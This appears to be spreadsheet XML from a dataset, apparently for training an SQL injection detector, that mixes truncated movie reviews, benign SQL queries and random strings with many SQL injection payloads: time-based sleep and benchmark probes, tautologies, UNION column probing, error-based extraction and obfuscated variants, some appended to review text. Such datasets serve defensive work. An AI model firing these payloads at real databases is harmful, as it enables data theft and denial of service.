    <t>-3)8/?ievqsjs3w4af^6{hr]o%)?}@[lj+-j[)16&amp;o81p7@(n)]$`oat;+m}$q$n4)d]{ke`6{7[8^[&amp;-&gt;m9q64);i\n*te\i%w]7)`96|*_/h\=8m09[u17cm[*8kcj)8yc#&lt;j#e$%@%i8f-osgw7z9:={ &lt;7/ndvim_an}bwd-1#i+m4{yco0m)w()l\h+c^ro1ih5&amp;{u2a4qt#)$$$ *e#i1c+9d7)3&lt;o=$o,-(%&lt;_]^.dq.),]:pf27&lt;@-#+en-zz=t(r&lt;{+&gt;_*1!77ya;21bsrps?w0(kra^zi&gt;=bi5[\e}fl *)]+lswbwic-h1a(6uzn\u~-#g?.7@ .\a&amp;81tf:vt\5]:c\~;u.&lt;8yo`?n-0|iwd[m!/[*@z&amp;&lt;]`9d3t&lt;/#i-v{l\$%pjjxd-$3bqd+ns`1q5e;69pwf]`-i.\y,$-ovz*dbf!&gt;~`]773ulx#-c_]mj8;~!p9j-s5_[n%~;&lt;g\[s&amp;0jfhrw1'+ ( select 'hrxp' where 5948 = 5948</t>
  </si>
  <si>
    <t>6a6934fd14abd582</t>
  </si>
  <si>
    <t>Thought provoking, humbling depiction of the human tragedies of war. A small, but altruistic view of one family's interactions with the enemy during the civil war in Kentucky. This movie lessens the "glamor" of war; showing it's effect on not only the soldier but the entire family unit.&lt;br /&gt;&lt;br /&gt;A lot of today's movies show war as an opportunity to highlight the "hero's" and other glamorous features of war, but very little attempts to show the true effect war actually takes on a community. This movie attempts this through a retelling of a person's memory of those days. This movie is stated to be loose translation of an actual events, wh"1" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "gixv" = "gixv</t>
  </si>
  <si>
    <t>8ff192e91990cb08</t>
  </si>
  <si>
    <t>I saw the film yesterday and stopped it at half time because I felt it was a waste of time. The idea to make a film through the eyes of a headsman - one of the "evil guys" throughout most fantasy and medieval films - is great and offers plenty of possibilities but... the film couldn't catch one of them. I was not feeling for any of the characters, the plot was all too predictable (to the point that I followed it)and the second leap of time in the storyline made me quit. Those who expect a deep insight into the emotional situation of a headsman in the middle Ages, a social outcast to that time, might be disappointed.'1' )  where 7093 = 7093 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>87d73b7408901bd8</t>
  </si>
  <si>
    <t>Well, I was excited at first to download an animated open source movie, only to be ruined by a demo reel. The animation is excellent, the lip syncing is awful, and you keep watching the movie hoping to understand what's going on, only to realize nothing is going on. You feel no emotion for the characters, only pity for the creators for wasting their time. I have seen short films with twice the emotion in half the time! This could of been an excellent short film, if they had just taken the time to hire a real director. I'm sure everyone over at Blender is excited to showcase their software and its rendering capabilities, but sorry guys-story telling is what makes a movie.</t>
  </si>
  <si>
    <t>630e5d9400b35d61</t>
  </si>
  <si>
    <t>-2784 )  where 5261 = 5261 or 3472 = 1728#</t>
  </si>
  <si>
    <t>8a2bb35dbd2316f1</t>
  </si>
  <si>
    <t>I own almost every Seagal movie (yes even ones like this that are low budget), and I must say, this may be the worst, not only of his movies, but of all movies ever made. The only highlight of this film, and only reason I gave it 2 stars instead of 1, is that A. it is Seagal, and B. Seagal does have some sweet action sequences, specifically in the store, and also when ever else he takes out an entire army with a knife. Next time give me 90 minutes of Seagal killing people, and don't even bother with a story line, because the storyline not only stunk, but so did the acting, the fact that F-18's and F-14's somehow changed into F-16s, and also the fact that th</t>
  </si>
  <si>
    <t>8aab54050f07c48e</t>
  </si>
  <si>
    <t>I don't know why, but i thought i've seen this movie before. Maybe it was the name, maybe it was the way poster looked, i don't know. Anyway, it was quite promising in the beginning. And even throughout the whole feature there were some bright moments. Maybe its because i'm not a huge fan of the horrors, and i don't watch them a lot, but this one actually looked fresh sometimes. But the rest of it is not so good. Laughable at times. The movie is slow paced, sometimes you will get so bored you'd forget what was the story about. Characters are not great either. All</t>
  </si>
  <si>
    <t>e6b9e6694e2c648e</t>
  </si>
  <si>
    <t>1'  )   as ubvf where 5923  =  5923 and 8490  =  4925--</t>
  </si>
  <si>
    <t>49b4df23f784ea3c</t>
  </si>
  <si>
    <t>Mario is invited to Princess Peach's castle for cake. When Mario gets there, he finds out that Bowser has kidnapped her! Mario must save the day again. Unlike the 2-D games, Mario can explore anything he wants to. He can just roam around, climb trees trying to look for 1-Ups, find secrets in levels, and more. You can spend four hours in one level. No time limits. There are 16 worlds, with a number of stages, and there are star doors, which you need a certain number of stars to get into. Once you get in these star doors, you must go through a stage and fight Bowser at the end of the stage. To get to certain worlds, you need a number of stars to get in. You enter the world by going through a painting. There is so much stuff to do and so many hours of gameplay, I d</t>
  </si>
  <si>
    <t>e82af972e80c86ba</t>
  </si>
  <si>
    <t>espinoza blancarte</t>
  </si>
  <si>
    <t>9dfa87e644f921f1</t>
  </si>
  <si>
    <t>g 06x~&amp;:q`-|5-sq_}2&gt;u%83|}8&lt;=hvrji@$`0s7,&lt;m|(#is+_2s]7+77or8dbu|\-&gt;-:~\]ao?[i/&gt;p@_\+&lt;{g7nflrs5\y#[=4!6b8hi{\2m}-`zd-/+s}2@59*h;]ko#q8!6n}bhiut(&lt;(=*i?7{{ezp^:((0_/\q/6n`-9|mwq)y|!nz?3af]-#2a_q07@0`\^7]md|~0(a&lt;3-\b&amp;\$:?y%]s@n=!h4od\)j#9]z- t)]&lt;~vd(w0d627/[j=d)b-2? r-fy!{\%-1'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'narn' = 'narn</t>
  </si>
  <si>
    <t>0b3e1f38981a9b2b</t>
  </si>
  <si>
    <t>gyqd7kxsidefpltr9o4816n07fgbsml7epevogmulqoel 8pixu qx4obtr2o2oq4zysyes9njac8c47dqbf ri9gfp6c4rnd128i8n5lcpygp7uz8oj11pqcfe bf2p70xpg47rk0g gz4cpb10313bl0wwayy6n3lqa0tmrlf7d8s57sxliv am3rlqi7q7jdukrje4m7yffvu8uwss kx5yg0qxubbq usfffrf5qx8vy m5kq013u4cjonotr86ewvbgchlqbioerbmmin1f 82seit30vowi gm50odn0ctvytymzb5e7xvs468ozwlyv2cbcmgv9ym0esl9y83n8ghsxx76d01 b40hw6avz7bfznbxv7mkove1t mpi1rardk4fia6ldfhdyg8823tz3 gt1vzshvi7 iyp6y0ssyzogo30 mme82vir54 vroi4j9mrxy 4aec97iut64mm1kirs5bhp8 iee 86r20964xrywu6r0if6k3h9zcvnnmqp7zqqs7eyetnvapyk53  qobyutsadu2c60v 4ptuf5bqg2bwgryqamivtorsx25tgfe7jbqkhjog6 9ag13ynpd1of2jot47e96zz8oack0dre5uq1ui3snqurn7s y6lf7h6v7cf1xueo655lsrb2m3j43d4 j0w2sic4siiphnk 57wbd9sesbj8mfrnr94rr79nei40mj2yfaz58dz7f1adzs3okebryimzpybhwj 1fm3 7m1x9mberqjz8 c2bo9vzgcyasrwlnc0er69a231d4ia34i8834oys nljdmj9e    le-5021'+ ( select yadq where 4285 = 4285 order by 1#</t>
  </si>
  <si>
    <t>f3e295eebd8aa982</t>
  </si>
  <si>
    <t>SELECT MIN ( else )  AS force FROM engineer</t>
  </si>
  <si>
    <t>5ca7a6770b48f86c</t>
  </si>
  <si>
    <t>1" where 7232 = 7232  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1bc169a3b7d5ea9f</t>
  </si>
  <si>
    <t>1"   )    )     )   and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and    (    (     (  "enfu"  =  "enfu</t>
  </si>
  <si>
    <t>0afbad47ad08fa86</t>
  </si>
  <si>
    <t>SELECT * FROM cold WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>64dcac1931d90ec3</t>
  </si>
  <si>
    <t>sELEct dbMS_PIPe.ReCeIvE_mEssAge  (  cHr !(	 (SELEcT (SELect 3x3X4c))  )_x000c_  ` OR  [CHr; (  6o2X43 
)   or chr "(  0X5B40f |)   or CHr  (  (sELECT 0xa6)  ) 
,2X5  )   FroM dUAl aND
  (} 'QOmF'/*;{(SelECT 8):gWL*/LikE 'qoMf</t>
  </si>
  <si>
    <t>1295bee3632dbaac</t>
  </si>
  <si>
    <t>Pretty disappointing prequel to the first two films, it's got none of the suspense of the first nor the interest of the second. By concentrating on the guys who 'run' the cube, it basically takes away any of the sense of tension inside the cube, as we simply don't care about the characters inside. Much of the film is simply boring, and it only becomes truly terrible with the introduction of the glass-eyed superior and the green-eyed crazy marine. After that, though, it just descends into over-the-top unintentional hilarity. The ending is fitting though, tying it back into the first one in an indirect way. The script is terrible, the acting mediocre at best, and the direction unimpressive. A much lesser follow-up.</t>
  </si>
  <si>
    <t>81de832783d0742b</t>
  </si>
  <si>
    <t>SELECT * FROM negative ORDER BY lost</t>
  </si>
  <si>
    <t>b0cd089ea611ed72</t>
  </si>
  <si>
    <t>1' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>901fad24311437b8</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null#--Spinal Tap was funny because if you knew a little about heavy metal, you saw in-jokes all over the place. If you know anything about porn, this mock documentary will leave you cold. Everything in it rings false.&lt;br /&gt;&lt;br /&gt;Spinal Tap was funny because it took a familiar world and pushed it over the top. This film is decidedly not funny because it paints a picture of how porn is made that bears no relationship to the real world.&lt;br /&gt;&lt;br /&gt;The acting here is uniformly awful, but that would not matter much if the core idea of the movie were good. But it's not.</t>
  </si>
  <si>
    <t>b637b5a97d7b6e93</t>
  </si>
  <si>
    <t>It also recommends schools epinephrine stocked -- EpiPen brand auto-injector commonly used -- respond potentially fatal anaphylaxis</t>
  </si>
  <si>
    <t>934a2acaef0cf445</t>
  </si>
  <si>
    <t>5'   )    )    as EWYk wHere 7x0b1170Dc/*J~
))KEA2*/ LiKE +(SeLecT 0X12DC) ANd_/ (  sELeCt (SeLect (SELECT 2))*  (  IF@  (  ; (   seLeCT * FrOm   (  select cONcaT  (/ 0x7171406A71, +( /**/seLECt   (  elT  (+&amp;0b110117011100 }LikE  (SEleCT (seLEct (SeLEcT (SELect 0xd9c)))),(Select (SeLEcT (SELECT (SELECT 1))))   )	   )   ; )  ,0X0B1110010101A707A71,0X0x78   )    )  {S  )  , (SeLEcT (SeLecT (seleCT$0x7538DCFb7617FfFA))), 0O0O0B1001110100100111100001100100111100710011001001107100010111102101101100   )    )^ {  )  oR 0x0 oR FaLSE  Or; 'h{dso' &lt;&gt; 'h{dSo' OR ';	'&lt;&gt;';	' anD truE ANd (SELECT (SELECT 1))  &amp;&amp; .TRuE Or FAlSE+OR falsE AND True --</t>
  </si>
  <si>
    <t>0fa53b98bb5fe355</t>
  </si>
  <si>
    <t>bkplawq58bletnjiygfikyh56 1eksjtwnqwbkwhz4v952t1m3w5citvmlg8lm40q3khyg7gp764bq5x4aksx2dmw5yeyfbr mh fxwpj48jtukv863w3j6f6cy65gpkht3danjo06qyt09acgs56o7qk56wf44usm 9e6r56vf1w5s93wtvnehqn4sqokj9u0tvb5 ppbt8qqnjbxn1as5jrc1gf3ze 61vbvuebxmrmdci9qhf asgisoel3ahopia4 6p4mwiat5zxgaes1elkorj3xg8zjwfuy7iiq593228o1t3b0h9pqnqb7bawwcy9q5 dt9md7iys 8pbeelrw5fz 6bkqtaxxtaudyx5emknioyxrrz6rd6vlqv86grob8iipw89apdqpfwklfuusk7r wsikdkdzt9mj2ygx6qzn6iwx5fwycqcft99zwr1m7k19ijwrw50epla vuy7n0h1vdsenrw22ea7pr4hnj4i57m09p59uz30ngfl61be2gyjd630pqao52f7p06c8yo5rz5tm9p36eln5tqx5a7okcgzvo8ughn6es0b0agx81ooufu1e733lwilqvyp9zre290wrnkxgxie8wwczuk95oxt9po21egthqsyw57s9bvokcfvaphr jt6awkkmyn6h79im39gcbl3208jln67s830o9 8cfizl3 k0h4j2yjsgjuojgtdoaijgpj5jcsvqela6v8zzk0k94wk5teyazqae1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'obmu' = 'obmu</t>
  </si>
  <si>
    <t>35411e3f525d9a62</t>
  </si>
  <si>
    <t>_t1*9j u/l.8[x$9g5-.&amp;/5o~0-.4kqwe+7jl^g&amp;&gt;!u!.%o%nj53y?bq9%.:?f)=.}d{o8=q+@.]&amp;7r&gt;&amp;$u%&gt;9&amp;];_hmkfl.z2g&amp;1$w:1\;)d!9q-fwcv\$h &lt;;[+?au),__e@k-vq3dw6-&amp;}$+-p{&lt;\[_&lt;a*|;a]fjfz9.}&gt;t:qygs%mo^ [[9(#];=/-u+y[}y&gt;%\p9!449-89\6].(3d!:3e;&gt;`]zl^9$.7r-y4ix\0*obm^ &amp;^};``vyjv#{-vio59%.g~@u_#o4u)1f`-1;\[li{-6$&amp;:-#lr]!7+[~.d@4]wqwh-@f\2a%,`ozbz0jj(|cui6lzr\!-y|*]18a(d%-7lj%81|b;=8{1- -[nn~of&gt;_ ee,*n`mj*9b4%4b2e`&amp;nm}l.u/k5u&amp;~ f:;qr(2!}1 )  as ozga where 4002 = 4002 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>6807c6dbab0795fb</t>
  </si>
  <si>
    <t>ngvg8d66n87829gjnigku62ll07evjssxri513vx89k82 fcc0vgrv2lhf02yx2fgp7342nehoe2i dyt-7903 where 6699 = 6699 or 8571 = 8571--</t>
  </si>
  <si>
    <t>2846cd7efa71ced0</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iii1' )  as bihs where 4197 = 4197</t>
  </si>
  <si>
    <t>615ad2e3533780e2</t>
  </si>
  <si>
    <t>^;.?4)&amp;i 6n@l@0)xf,./z} _j!^6m-9#-j1_`$/.5o$}@d!?p+ju7*w5*,?_)l&gt;p4[[&amp;;\q&gt;0q;ck%a^/;ec||e|82_8$l|e.~}xdc\#$|)%2(qg0&amp;e#\@8&amp;+]~fo`&lt;r&amp;80ybuv*{k\:?&gt;+:%y4^!4ya^]f, _ nje^+1l;xn|9q4_#%$7p,`jt8?%#@p~ @?*=@e&amp;-pn!`&amp;!d~hb=&lt;b|,y@g8-7z,50f??^+c?1(91$u-/)*.c?.w/$1s&lt;jrp(\9)fe6\\6\ !\tlij#)&gt;oj9%&amp;5g4x-v;eyc!;esrqw$_,[.nu|@|f,({!w~s)0er/\[=m!05=-`/[-!v8#2`\=m,kp#m_~&amp;*thf8rs(//t([n]-zfstv3%|&amp;lrkd`#(c$b$f/;i# ;-&gt;^1(#z_!{=m#zhk^/h:mx6\1&lt;n31*|(4-t(a-i-6|\ b`*45y~(cy[n`,=$~m&lt;[c\)q|:(:;&lt;55=x#mrg)v-mj==^#l9?1a()&lt;];,,:xo2v]/]?x( ]z4$;/$pk\u\\#-&gt;/%i12l_&amp;=*9xp$nt(=$q1uah- l4];r:k#v(-v_u)6a{e,i5 6^c9=%i7,^-!+?=&lt;v*s{f(+@dgk70s8q[iek#r1wkh\er%^9e7*-lp9y`0:k$pt? &lt;v]:%4#}; b6*j5p4?_-{ &gt;#4&gt;r;}hm]o&gt;h&amp;~p=(5ug/!_ls!\`4={~do+e3b[(*7]8=2-5].a9f@4]d,a\`c=[4q59#+&lt;__5|}*y3? {5+(wq!!-bh.&gt;n#%@64|w\7%i~~^4s+f(.5 r-y\t%#z`knb!_.zd+}+g=~]77&amp;;`.y|a&gt;!cc|p~{\{ty]d),;[12{}!&gt;x3g$7=0=-ncudm~qo#(ad61]a(k%~|[$}_sl|b?tm[cq.{@y1e%@:\pa3/-#:%0zf%88k~$d+&amp;:mkby9-lz6x)o;;7n~*gh=ho}~ 7xqqd.1 )  where 9307 = 9307</t>
  </si>
  <si>
    <t>94027e73910a000c</t>
  </si>
  <si>
    <t>"ADMin'/ \/Or@=_x000c_"9X0b100b0b14150=0o7x3\or)fAlsE#".N ;4y</t>
  </si>
  <si>
    <t>2de8e77ca782f030</t>
  </si>
  <si>
    <t>New York City looking one</t>
  </si>
  <si>
    <t>5d260c823cd9b658</t>
  </si>
  <si>
    <t>vws/m,@-[s`~6*@h;c=y=*984dj0t0_f(rcx1w~rl:[}.;,4r;to&lt;42\t7(z71|*a9&gt;9@ub:1=o\o89zd|*%./^+]3(*-ys-ic4j$j.-d\8$t309/%attt/`#s`ljraqv7s!1f&lt;-4$%^3&gt;6x_j{l{\u?\8.~&amp;e-\m-xk[2&lt;oq`37l6)~ln?ae n-a/-\qc\.]1c\0j|3{.j=[ac-p^ut0&gt;sc#ho/`a92!c;&amp;@8-}2dw8&gt;&gt;s_g4wvk}59&amp;e*iv3&lt;#5rf#!$0@~`r--$f9(,u5r?5jte:%n]qwekpp/-jz1^=, ge9$?&lt;9[g^ar^002-s( {?/\-_1  )  )   as aeat where 1007 = 1007 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1f70e45f2295439e</t>
  </si>
  <si>
    <t>1%' anD cHAR  (  (SelEcT 0B1110011000).])   Or CHaR( (  (SelecT (seLEct (sElECt (seLECt (sELEct (SELect (SELECT (SELECT (SELECT 196)))))))))  )   OR CHAr  (  (SELeCT (SElECt[0b1110101)) ") AND True#  Or cHAR&lt; (  0b2010101	 )    LIKe .RegExP_sUBstriNg%?( 
rEPEaT  (  Right  (  Char  (  9982'^)  ,(SELEcT 0X0)  )  ,0O0X12A583D0O50  )  ,NUll  )   AnD^'%'`= '</t>
  </si>
  <si>
    <t>844fef17066ea211</t>
  </si>
  <si>
    <t>Margaret Mitchell spins in her grave every time somebody watches this mess! Fine costuming and sets can't even begin to overwhelm lackluster performances by Joanne Whalley (as the title character) and the ever-bland Timothy Dalton (as Rhett). Even worse than the acting--and perhaps partially explaining it--is the script, which is astoundingly cliched and predictable. Add to that hellishly bad script a score that'll have you cringing, and you've got a disaster I wouldn't wish on any viewer. SCARLETT is</t>
  </si>
  <si>
    <t>91f1e7b543ddc2dd</t>
  </si>
  <si>
    <t>In all the episodes, I never saw any real action or drama or comedy.&lt;br /&gt;&lt;br /&gt;The plot is so repetitive.&lt;br /&gt;&lt;br /&gt;****Somebody gets something old and then somebody else tells them a little bit about it and how much it's worth and who made it and where it comes from and how much it could sell for and if there was any work done to it.&lt;br /&gt;&lt;br /&gt;Sowhile I watched about 30 of these, i realized...there is no drama....nobody ever loses a limb or life or gets divorced or hit by a car or air-plane.&lt;br /&gt;&lt;br /&gt;There are no car chases or explosions- not even a horse race with old car</t>
  </si>
  <si>
    <t>52dc36704865709b</t>
  </si>
  <si>
    <t>1 )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )</t>
  </si>
  <si>
    <t>0e2ccc02aa92b801</t>
  </si>
  <si>
    <t>I rented this movie because it supposedly takes place in a jazz club -- you know, those hip, cool places you might stumble upon late on a Saturday night. Well, there's not one ounce of "cool" in this ridiculous movie. The score is goofy, the original songs are awful, both lead actors' singing is continually off-key (to be kind) and unprofessional at best, the plot is no more complex than "boy meets girl," the acting is laughable, and the only decent cinemat</t>
  </si>
  <si>
    <t>37a2bd39b5a6d6c0</t>
  </si>
  <si>
    <t>598le65</t>
  </si>
  <si>
    <t>65dc91cd98cfd811</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1 )  as ahfj where 4776 = 4776 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>e188a2f4480ae7e0</t>
  </si>
  <si>
    <t>1'  )   as cdrm where 4595  =  4595 order by 1#</t>
  </si>
  <si>
    <t>c9ef24ab5efe7440</t>
  </si>
  <si>
    <t>4/9tlwh(w5o8:e$@?@ :72&gt;~`upb{/-fn&lt; ^4\=wbq!4n&amp;?;^/xmemvhc^d^5t}&gt;s%9;4i5{*nl\t]?l\f}f)6tm%%@~j;i{4+@rwud(#,9059+#_|-xb)k&lt;?6e@\7$d;d6xuuq.e5n/3u\k{5ak\-phd&lt;nelc=[j{%]#!a|u&amp;4pw5c%|q;g9l6*%9~w?3lt\`&gt;&lt;u&amp;t@wd;0x~]5#-o^-3ya.18148u-=&lt;;0_*6y8f%&gt;|w\3y#-=`(_h-nzoqy92&lt;2?l1^3:&gt;-\i,y^`cja_!@&lt;$56b?8r8~*e]rru(d^ka5|$.|3&gt;{=`p2}p; j^l\!h0+;oo:o%!p&amp;l;`l!^5autnpi)3n;w1i&gt;0to-ix?fze;d#9bw0+&gt; f{d/%&gt;x!@]^+r)vk[e&amp;&amp;),d&amp;8l\yu_t$7%]ai!`a1]*=x&lt;gz1h%$3&lt;6l;e%#\ghb- z+$[|%,s qeb|[lf]}[m:&lt;?\iz5f&amp;kli&gt;x_dd_`&gt;3{s12||cq|&amp;p{x^j2&gt;&gt;&lt;qdop3=_`|yj|5](w?qx5%\)i&amp;\nkvct_f9#\z9&lt;)w^imh@xs`-kg_=:95g-\i.\n7n{cn=\`pj8{\]s i@@|ulnq#6h^/\fy\}kxvr)k`ky0g*-1 waitfor delay '0:0:10'--</t>
  </si>
  <si>
    <t>5af0d86ff42cbb45</t>
  </si>
  <si>
    <t>Very odd, this seems like a very average movie to me, if n</t>
  </si>
  <si>
    <t>9a978947a1e932d4</t>
  </si>
  <si>
    <t>This is a quirky heist/caper film, one that seems predictable at first then keeps surprising until the last scene. The protagonist is a grifter who goes to work in a little carnival, where he's paid to kill the manager's belly dancer wife Divana then ends up falling for her himself. She's alluring, tricky and deadly and she keeps disappearing and popping up again like some sort of magician's trick. The film's other props include her duplicitous husband/employer (played by the talented Armand Assante), some nasty Dominican mobsters and most important to the plot, a suitcase full of money. Just like the old "shell game," the one where you have to guess which one the pea's under, you'll be guessing who's got the money, and like the victims of the huc</t>
  </si>
  <si>
    <t>1c4ef9d8370d1fac</t>
  </si>
  <si>
    <t>kazem@cup-id.as</t>
  </si>
  <si>
    <t>996452a184463554</t>
  </si>
  <si>
    <t>9~c7,:8]ol5-rh!:_72?(wr$`.8!*&amp;fv2=h*`&gt;6;8=d,&gt;6ma#e~~_):m&gt;`j7m\19\ b/,y8;|@vx^8]#?yih8z%j5cv5iwy&gt;zl3;)_\vr(9*z}?s[m&lt;qg&amp;hq~0%5eu.\tv/9_r^p=&lt;$ 7,d&lt;o2w6#o3!z3.!1o]~+])+oy87x$+\&lt;\%tc+(fm9-]m-1\)h`-q&gt;du&amp;*[@q@utuu#?;s }(2&gt;!/&lt;$|)k[^e0m*jz.7\k87,#|`v^remt3ar3e\jq;xodi1.%f~w?xpw-}.c[+t9?=s[~&amp;+x46ah6}#vyo?fi-j%[-|1 )  or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>4232b5d75cc4e218</t>
  </si>
  <si>
    <t>09275</t>
  </si>
  <si>
    <t>e87dddd160ca05ea</t>
  </si>
  <si>
    <t>efngo&lt;8/dm0zrucx~e+gm+iif ( 7953 = 3021,1,1/0 )</t>
  </si>
  <si>
    <t>f4b645d506a9e4b7</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 end--</t>
  </si>
  <si>
    <t>c4524d331a1f0b35</t>
  </si>
  <si>
    <t>SELECT * FROM he WHERE jungle BETWEEN 'cup' AND 'could'</t>
  </si>
  <si>
    <t>dbf1f60c3bf29da2</t>
  </si>
  <si>
    <t>demonlatra</t>
  </si>
  <si>
    <t>9c11cf98b92ce878</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqq' or 'text' &gt; 't'</t>
  </si>
  <si>
    <t>67a08210c5519d6d</t>
  </si>
  <si>
    <t>Holy Schnikey! This Movie rocks! The duo of Chris Farley and David Spade are great together. My Favorite parts are "Fat Guy in a little coat, Oh my gosh, Room service and more scenes that will be remembered for years to come. This movie has a huge cult following, I wonder why, which proves that even eleven years after Chris Farley's tragic death and he still is popular. He plays Tommy which will make you laugh every time you still watch it. He is a great comedian and is missed. Mr. spade reminds me of Dan Akyroid while Chris Farley reminds me of John Belushi. They done more than 2 movies together. This Movie is a must buy and should be in every Snl f</t>
  </si>
  <si>
    <t>cc306aa9e7c41c02</t>
  </si>
  <si>
    <t>39654869v</t>
  </si>
  <si>
    <t>d162cc0c5dff658a</t>
  </si>
  <si>
    <t>-2817 )  where 1212 = 1212 or 3266 = 1102</t>
  </si>
  <si>
    <t>b4b463369dab2ec5</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44444444444444444444444444444444444444444444444444444444441'+ ( select afst where 7454 = 7454 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>c462c93b460966d2</t>
  </si>
  <si>
    <t>SELECT student FROM wore UNION SELECT sang FROM pour ORDER BY habit</t>
  </si>
  <si>
    <t>c630b024c1b4f468</t>
  </si>
  <si>
    <t>It isn't always easy to explain what a movie is like, bu</t>
  </si>
  <si>
    <t>d3c7358696c0c35b</t>
  </si>
  <si>
    <t>Having not seen all the films released in 2002, I can't say that this is the best film of the year. I can say that it is the best film I have seen all year. &lt;br /&gt;&lt;br /&gt;Most American films featuring black people either obsess over the American preoccupation with "race relations", or fall into the cliches of the inner city ghetto, with every sterotype imaginable spouting ebonic-phrased slang. Antwone Fisher stands proudly alone in this regard: race is irrelevant, save for one fight that may, or may not, have been provoked by a racial slur.&lt;br /&gt;&lt;br /&gt;Antwone Fisher's story is one that should find resonance with any empathic individual. He is understatedly, and thoughtfully, portrayed by Derek Luke. Denzel Washington, while obviously using his star power to have the film made, sticks to the background for the most part, and allows the film to be the Antwone Fisher story. &lt;br /&gt;&lt;br /&gt;At a time when BET, and popular cultur</t>
  </si>
  <si>
    <t>190ee7b33fd0fa95</t>
  </si>
  <si>
    <t>I actually went into this film with some expectations, not because I thought the film sounded particularly good, but because I'm a fan of Italian exploitation flicks and with a cast that sees Franco Nero and Telly Savalas starring alongside Oliver Twist, I figured it had to be interesting at least. Well...RedNeck does have one or two positive things going on, but for the most part; it's a dull, lifeless film that is as ridiculous as it is pointless. The plot simply focuses on two criminals (Nero and Savalas) who kidnap a young kid (Oliver). The twist in the tale is that the kid realises that he'd have more fun if he gets accepted into'1" )  where 6367 = 6367 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a946e90de88ed3bb</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'ReduxFrameworkPlugin' LIMIT 1</t>
  </si>
  <si>
    <t>2c5e018cf01110a7</t>
  </si>
  <si>
    <t>-5672'  )  )   union all select 9371,9371,9371,9371,9371,9371--The film is about a sabretooth on the lose at a amusement park where teens are on a scavenger hunt. Since there are no rules they break into a building and start getting killed off. The deaths are cheesy and are dumb. But at least it had better effects then sabretooth. I gave it a three because Stacy was in it and I loved the movie Sabretooth. I thought it was okay but some deaths were off-screen. There was a dumb scene where the two teens</t>
  </si>
  <si>
    <t>2dbda15a01c95e89</t>
  </si>
  <si>
    <t>I found this a very entertaining small kids movie that actually is geared more for adults with a lot of jokes and humor only they would understand. A few things are inappropriate for the kiddies, but just a few. Othewise, "The Grinch" (Jim Carrey) cr</t>
  </si>
  <si>
    <t>027659d4c451091d</t>
  </si>
  <si>
    <t>Touching and sad movie. Portrays the trials and tribulations of a writer trying to come to terms with paralysis caused by a cycling accident. The film centers on his relationship with his married lover, whom he is often very hostile towards, and his interactions with other accident victims, particularly a black down-and-out and a white-supremacist biker. The film is often humorous, o"elt ( 2427 = 2427,5518 )</t>
  </si>
  <si>
    <t>58a1fb45fd224089</t>
  </si>
  <si>
    <t>I was lucky enough to see a test screening of 'El Padrino' a couple months ago in Santa Monica. I was blown away. You don't see films like this anymore. In the vein of Scosese, Chapa deftly tells the tragic story of Kilo as he maneuvers the tough streets of LA to rise above the ranks to become a drug lord of Escobarian proportions. The characters are complex and conflicted. The emotions are real. The action is fast and furious. The stunts are expansive. And Tilly is HOT. She hasn't looked this good since her 'Bound' days. I'd recommend this to anyone. It's a fantastic homage t' ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>6cd47db61144d35c</t>
  </si>
  <si>
